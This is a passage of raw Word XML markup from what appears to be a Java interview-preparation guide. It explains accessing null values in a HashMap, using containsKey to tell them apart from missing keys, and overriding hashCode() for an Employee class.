    <w:p w14:paraId="310AD094" w14:textId="08F3C378" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17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827214113"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>expectedSiz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loadFactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60156E76" w14:textId="0772BB83" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CC3A7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4E95BC8">
          <v:rect id="_x0000_i1541" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7109FE33" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_Toc196307655"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we access null value in HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w14:paraId="08648B48" w14:textId="18472F48" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="009A19CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can access a null value from a HashMap just like any other value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143FF85D" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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Let’s break it down clearly </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527CBE4" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F3D18">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84340A1">
          <v:rect id="_x0000_i1542" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C5EE4E" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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Example: Accessing a null value in a HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560E0F0C" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74641C91" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA8E561" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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i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D749A12" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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D478A98" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="0C9CABD5" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7178D036" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        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Key with null value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D88C8C" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        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nullKeyValu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Null key with value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894A41D" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4968AA6D" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output: null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5EF2C9" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output: nullKeyValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894E509" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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3233FD8" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F384784" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F3D18">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7131563">
          <v:rect id="_x0000_i1543" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C76C2" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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Not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0"/>
        <w:gridCol w:w="2979"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="22B09E89" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0804C839" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="008231A2">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peration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A81DAB8" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="008231A2">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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="773D6CAF" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CBEB181" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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p.get("name")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AAC837E" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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s null (actual value is null)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="021446FA" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A7F75B5" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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p.get("unknown")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56D3453E" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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s null (key doesn't exist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EF38410" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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Important Distinction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1E5034" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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map.get(key) returns null, you can't tell directly if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7A513" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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key exists and value is null, or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8476A3" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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key doesn't exist at all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C80F8D" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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o handle that, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A34F0" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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403222"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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ntainsKey</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DAD9FE6" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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4032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Key exists with value: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ap</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ame"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DC03B0" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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403222"/>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ls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B863535" w14:textId="77777777" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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4032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Key does not exist."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DAC5B" w14:textId="7BE96FE6" w:rsidR="008231A2" w:rsidRPr="00CE4B95"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403222"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D888013" w14:textId="3E7C90F7" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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60"/>
        <w:gridCol w:w="3320"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="20EE03D4" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48A5FED1" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="008231A2">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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="232D6E52" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="008231A2">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nswer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="6ACD58BD" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66158CCB" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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we store null values in HashMap?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C72B19" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="0BF4EC06" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D231C2" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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we access them?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34CBDD48" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="0A6A01F3" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0F65FD" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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at if key doesn't exist?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FC88383" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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s null (same as if value is null)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="6BBA9B23" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD97416" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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How to differentiate?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74473B4B" w14:textId="77777777" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="005F3D18">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containsKey(key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EBA8589" w14:textId="3F777A35" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F3D18">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940367F">
          <v:rect id="_x0000_i1544" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE07314" w14:textId="77777777" w:rsidR="00D9071D" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9071D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_Toc196307656"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How hashcode calculations happened on the Employee object?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
    </w:p>
    <w:p w14:paraId="179A1CD1" w14:textId="4D1B6658" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">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Java, the hashCode() calculation is used to generate an integer value that represents the internal hash code of an object. This hash code is crucial for quickly locating an object in hash-based collections like HashMap, HashSet, and Hashtable. For custom objects, like an Employee object, you can override the hashCode() method to provide a meaningful hash code based on the object's fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E503381" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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ow hashCode() is Calculated for the Employee Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D48A78"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create a custom class (e.g., Employee), the default hashCode() method from the Object class is inherited, which typically provides a memory address-based hash code. However, to make hashCode() meaningful for collections like HashMap, you should override it to return a hash value that is derived from the object's fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D0F6AF" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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eps to Calculate hashCode() for an Employee Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C94704A"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et’s assume the Employee class has two fields: id (a unique employee identifier) and name (employee's name). The hashCode() method should be overridden to generate a hash code that reflects the values of these fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4A31E"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s an example of how hashCode() can be implemented for an Employee object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812A6BE" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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hashCode() Calculation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E938FA0"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Objects;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9EDB4" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6820E08A"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5052F948"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int id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A320F42"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D801120" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051DAA4E"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onstructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1B3638"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Employee(int id, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FBF1E9"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id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C633D"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF81512"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E4D1B52" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1DF313"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Override hashCode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B031B63"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613E65A0"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int hashCode() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CDA1F6"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Objects.hash(id, name);  // A simple way to calculate hashCode using multiple fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB375B"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717617E" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07040AE6"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Getters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122D127"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int getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBE9676"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id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F3023"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F06B7E8" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCA2F9A"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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A90E523"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B3406A"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EBAEE09"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44AACB5" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
